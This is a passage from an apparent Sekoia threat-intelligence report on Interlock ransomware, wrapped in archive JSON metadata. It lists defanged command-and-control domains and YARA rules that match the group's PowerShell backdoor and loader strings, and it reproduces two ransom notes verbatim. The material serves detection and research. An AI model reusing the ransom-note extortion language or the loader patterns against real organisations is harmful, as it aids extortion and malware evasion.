24\n\nlancaster-sean-initial-ru[.]trycloudflare.com\r\ncasting-advisors-older-invitations[.]trycloudflare.com\r\nsublime-forecasts-pale-scored[.]trycloudflare.com\r\ninvestigators-boxing-trademark-threatened[.]trycloudflare.com\r\nfotos-phillips-princess-baker[.]trycloudflare.com\r\nwashing-cartridges-watts-flags[.]trycloudflare.com\r\ncomplement-parliamentary-chairs-hc[.]trycloudflare.com\r\nopen-exceptions-cleared-feelings[.]trycloudflare.com\r\nmedicine-podcasts-halo-expected[.]trycloudflare.com\r\nsecurities-variance-vocal-temporal[.]trycloudflare.com\r\nscientific-shown-desperate-ratio[.]trycloudflare.com\r\nviews-ethics-orientation-roommate[.]trycloudflare.com\r\npipe-hawaii-monkey-automatic[.]trycloudflare.com\r\ncalifornia-appeals-pilot-harper[.]trycloudflare.com\r\nuna-idol-ta-missile[.]trycloudflare.com\r\nmusicians-implied-less-model[.]trycloudflare.com\r\nstrain-brighton-focused-kw[.]trycloudflare.com\r\nmortgage-i-concrete-origins[.]trycloudflare.com\r\nwww.sublime-forecasts-pale-scored[.]trycloudflare.com\r\nYARA rules\r\nrule backdoor_win_interlock_powershell_backdoor {\r\nmeta:\r\n id = \"678827c2-9416-417b-98c3-6e22010bb541\"\r\n version = \"1.0\"\r\n malware = \"Interlock RAT\"\r\n description = \"Detect the Interlock PowerShell backdoor\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-24\"\r\n classification = \"TLP:GREEN\"\r\nstrings:\r\n $ = \"path: '/init1234'\" nocase\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 18 of 24\n\n$ = \"Get-PSDrive -PSProvider FileSystem\" nocase\r\n $ = \"[security.principal.windowsidentity]::getcurrent().name\" nocase\r\n \r\ncondition:\r\n all of them\r\n}\r\nimport \"pe\"\r\nrule crypter_win_InterLock_resources {\r\nmeta:\r\n id = \"9b9fdb90-4227-4bd1-a7a8-6b4cef71ee44\"\r\n version = \"1.0\"\r\n malware = \"InterLock\"\r\n intrusion_set = \"Interlock ransomware operators\"\r\n description = \"Detect resources used in every files tied to InterLock malware\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2024-11-14\"\r\n classification = \"TLP:GREEN\"\r\ncondition:\r\n for any i in (0..pe.number_of_resources-1) : (\r\n hash.sha256(pe.resources[i].offset, pe.resources[i].length) == \"0e0a647b3156d430cd70ad5a430277dc99014d0\r\n or hash.sha256(pe.resources[i].offset, pe.resources[i].length) == \"58ed0431455a1d354369206a1197d1acfcd3\r\n )\r\n}\r\nrule Interlock_ClickFix_PowerShell_loader {\r\nmeta:\r\n id = \"78e02729-d926-4600-affc-6e249e90ce19\"\r\n version = \"1.0\"\r\n intrusion_set = \"Interlock\"\r\n description = \"Detect the PowerShell loader used by Interlock operators to execute the PowerShell backd\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-31\"\r\n classification = \"TLP:GREEN\"\r\n \r\nstrings:\r\n // \"}.Items(), 4 + 16)\"\r\n $ = {7D 2E 49 74 65 6D 73 28 29 2C 20 34 20 2B 20 31 36 29}\r\n$ = \"} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(\"\r\n \r\ncondition:\r\n all of them\r\n}\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 19 of 24\n\nrule crypter_win_interlock_keywords_nov24 {\r\nmeta:\r\nid = \"ae3905ee-046b-415e-b83c-9e5d07d6b443\"\r\nversion = \"1.0\"\r\n intrusion_set = \"Interlock ransomware operators\"\r\ndescription = \"Finds crypter used by Interlock and Rhysida intrusion sets\"\r\nsource = \"Sekoia\"\r\ncreation_date = \"2024-11-18\"\r\nhash = \"1f568c2eaa8325bf7afcf7a90f9595f8b601a085769a44c4ffa1cdfdd283594c\"\r\nhash = \"8e273e1e65b337ad8d3b2dec6264ed90d1d0662bd04d92cbd02943a7e12df95a\"\r\nstrings:\r\n$wrd01 = \"ceremoniously\" ascii\r\n$wrd02 = \"biophysicist\" ascii\r\n$wrd03 = \"cyberpunks\" ascii\r\n$wrd04 = \"undercarriages\" ascii\r\n$wrd05 = \"abomination\" ascii\r\n$wrd06 = \"greediness\" ascii\r\n$wrd07 = \"Heaviside\" ascii\r\n$wrd08 = \"misapprehending\" ascii\r\n$wrd09 = \"magnetosphere\" ascii\r\n$wrd10 = \"distinctively\" ascii\r\n$wrd11 = \"stringently\" ascii\r\n$wrd12 = \"sentimentalist\" ascii\r\n$wrd13 = \"hydrocarbons\" ascii\r\n$wrd14 = \"discontinuations\" ascii\r\n$wrd15 = \"woodcutter\" ascii\r\n$wrd16 = \"preoccupation\" ascii\r\n$wrd17 = \"pocketful\" ascii\r\n$wrd18 = \"Polynesian\" ascii\r\n$wrd19 = \"laundrymen\" ascii\r\n$wrd20 = \"hyprocri\" ascii\r\n$wrd21 = \"interlocking\" ascii\r\n$wrd22 = \"blackballing\" ascii\r\n$wrd23 = \"selectivity\" ascii\r\n$wrd24 = \"incontrovertible\" ascii\r\n$wrd25 = \"mutinously\" ascii\r\n$hea01 = \"\u003csupportedOS Id=\\\"{\" ascii\r\ncondition:\r\nuint16(0)==0x5A4D\r\nand 5 of ($wrd*)\r\nand #hea01 \u003e 4\r\nand vt.metadata.new_file\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 20 of 24\n\nand filesize \u003c 2MB\r\n}\r\nRansom notes\r\nfrom a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642 (2024-10-11)\r\n!__README__!.txt\r\n INTERLOCK - CRITICAL SECURITY ALERT\r\nTo Whom It May Concern,\r\nYour organization has experienced a serious security breach. Immediate action is required to mitigate\r\n THE CURRENT SITUATION\r\n- Your systems have been infiltrated by unauthorized entities.\r\n- Key files have been encrypted and are now inaccessible to you.\r\n- Sensitive data has been extracted and is in our possession.\r\n WHAT YOU NEED TO DO NOW\r\n1. Contact us via our secure, anonymous platform listed below.\r\n2. Follow all instructions to recover your encrypted data.\r\nAccess Point:\r\nUse your unique Company ID:\r\n DO NOT ATTEMPT:\r\n- File alterations: Renaming, moving, or tampering with files will lead to irreversible damage.\r\n- Third-party software: Using any recovery tools will corrupt the encryption keys, making recovery im\r\n- Reboots or shutdowns: System restarts may cause key damage. Proceed at your own risk.\r\n HOW DID THIS HAPPEN?\r\nWe identified vulnerabilities within your network and gained access to critical parts of your infrast\r\n- Personal records and client information\r\n- Financial statements, contracts, and legal documents\r\n- Internal communications\r\n- Backups and business-critical files\r\nWe hold full copies of these files, and their future is in your hands.\r\n YOUR OPTIONS\r\n#1. Ignore This Warning:\r\n- In 96 hours, we will release or sell your sensitive data.\r\n- Media outlets, regulators, and competitors will be notified.\r\n- Your decryption keys will be destroyed, making recovery impossible.\r\n- The financial and reputational damage could be catastrophic.\r\n#2. Cooperate With Us:\r\n- You will receive the only working decryption tool for your files.\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 21 of 24\n\n- We will guarantee the secure deletion of all exfiltrated data.\r\n- All traces of this incident will be erased from public and private records.\r\n- A full security audit will be provided to prevent future breaches.\r\n FINAL REMINDER\r\nFailure to act promptly will result in:\r\n- Permanent loss of all encrypted data.\r\n- Leakage of confidential information to the public, competitors, and authorities.\r\n- Irreversible financial harm to your organization.\r\n CONTACT US SECURELY\r\n1. Install the TOR browser via\r\n2. Visit our anonymous contact form at\r\n3. Use your unique Company ID:\r\n4. Review a sample of your compromised data for verification.\r\n5. Use a VPN if TOR is restricted in your area.\r\nfrom 4a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9 (2025-02-21)\r\nFIRST_READ_ME.txt\r\nFinal Warning: Your Data Is at Risk\r\nTo the Leadership of Your Organization\r\nWe have encrypted your systems and extracted sensitive information from\r\nyour network. Your organization's failure to prioritize cybersecurity\r\nhas left critical data vulnerable, and now, the consequences are at\r\nhand.\r\n---\r\nWhat You Need to Know:\r\n1. We have seized key documents, customer information, and confidential\r\nbusiness data.\r\n2. Access to these files has been locked with advanced encryption.\r\n3. Responsibility for this breach lies with your organization, as you\r\nare obligated by law to protect Non-Public Information (NPI).\r\n---\r\nLegal and Financial Risks:\r\nIf you fail to act within 72 hours, we will begin publishing your data\r\non our leak platforms. The consequences will include:\r\n- Violations of laws such as GDPR, HIPAA, CCPA, GLBA, and NYDFS\r\nCybersecurity Regulation.\r\n- Severe fines for non-compliance and lawsuits from affected parties.\r\n- Long-term reputational damage to your business, leading to client and\r\npartner losses.\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 22 of 24\n\n---\r\nYour Actions:\r\nTo prevent escalation, you must cooperate immediately.\r\n1. Access our Recovery Platform via TOR Browser:\r\n - Download TOR from\r\n.\r\n - Open:\r\n - Use your Organization ID\r\n to create a\r\n private negotiation chat.\r\n2. Alternative Access for Regular Browsers:\r\n - Open Chrome, Edge, or Firefox.\r\n - Navigate to:\r\n - Enter your Organization ID\r\n for\r\ninstructions.\r\n---\r\nImportant Warning:\r\n- Do not attempt self-recovery; it will fail and lead to data\r\ncorruption.\r\n- Avoid engaging third-party negotiators or law enforcement; this will\r\nvoid any possibility of resolution.\r\n- Remember, the data we hold could be used by regulators, competitors,\r\nor even the media, causing irreparable harm to your business.\r\nTime is of the essence. Every hour of inaction increases the likelihood\r\nof devastating consequences. Make the right decision secure your future\r\nby cooperating with us now.\r\nList of references\r\n[Fortinet] Ransomware Roundup – Interlock, \r\n[Cisco Talos] Unwrapping the emerging Interlock ransomware attack\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 23 of 24\n\nTDR is the Sekoia Threat Detection \u0026 Research team. Created in 2020, TDR provides exclusive Threat\r\nIntelligence, including fresh and contextualised IOCs and threat reports for the Sekoia SOC Platform TDR is also\r\nresponsible for producing detection materials through a built-in Sigma, Sigma Correlation and Anomaly rules\r\ncatalogue. TDR is a team of multidisciplinary and passionate cybersecurity experts, including security researchers,\r\ndetection engineers, reverse engineers, and technical and strategic threat intelligence analysts. Threat Intelligence\r\nanalysts and researchers are looking at state-sponsored \u0026 cybercrime threats from a strategic to a technical\r\nperspective to track, hunt and detect adversaries. Detection engineers focus on creating and maintaining high-quality detection rules to detect the TTPs most widely exploited by adversaries. TDR experts regularly share their\r\nanalysis and discoveries with the community through our research blog, GitHub repository or X / Twitter account.\r\nYou may also come across some of our analysts and experts at international conferences (such as BotConf, Virus\r\nBulletin, CoRIIN and many others), where they present the results of their research work and investigations.\r\nShare this post:\r\nSource: https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nhttps://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/\r\nPage 24 of 24", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/" ], "report_names": [ "interlock-ransomware-evolving-under-the-radar" ], "threat_actors": [ { "id": "1b1271d2-e9a2-4fc5-820b-69c9e4cfb312", "created_at": "2024-06-07T02:00:03.998431Z", "updated_at": "2026-04-10T02:00:03.64336Z", "deleted_at": null, "main_name": "RansomHub", "aliases": [], "source_name": "MISPGALAXY:RansomHub", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "77b28afd-8187-4917-a453-1d5a279cb5e4", "created_at": "2022-10-25T15:50:23.768278Z", "updated_at": "2026-04-10T02:00:05.266635Z", "deleted_at": null, "main_name": "Inception", "aliases": [ "Inception Framework", "Cloud Atlas" ], "source_name": "MITRE:Inception", "tools": [ "PowerShower", "VBShower", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "8c8fea8c-c957-4618-99ee-1e188f073a0e", "created_at": "2024-02-02T02:00:04.086766Z", "updated_at": "2026-04-10T02:00:03.563647Z", "deleted_at": null, "main_name": "Storm-1567", "aliases": [ "Akira", "PUNK SPIDER", "GOLD SAHARA" ], "source_name": "MISPGALAXY:Storm-1567", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84", "created_at": "2024-04-24T02:00:49.516358Z", "updated_at": "2026-04-10T02:00:05.309426Z", "deleted_at": null, "main_name": "Akira", "aliases": [ "Akira", "GOLD SAHARA", "PUNK SPIDER", "Howling Scorpius" ], "source_name": "MITRE:Akira", "tools": [ "Mimikatz", "PsExec", "AdFind", "Akira _v2", "Akira", "Megazord", "LaZagne", "Rclone" ], "source_id": "MITRE", "reports": null }, { "id": "13623ffb-4701-4f3d-bf32-8826346433ac", "created_at": "2024-12-21T02:00:02.850766Z", "updated_at": "2026-04-10T02:00:03.784245Z", "deleted_at": null, "main_name": "FunkSec", "aliases": [], "source_name": "MISPGALAXY:FunkSec", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434692, "ts_updated_at": 1775791850, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b139c9201b7bf2c2aec96a7660254f37e035ae9a.pdf", "text": "https://archive.orkl.eu/b139c9201b7bf2c2aec96a7660254f37e035ae9a.txt", "img": "https://archive.orkl.eu/b139c9201b7bf2c2aec96a7660254f37e035ae9a.jpg" } }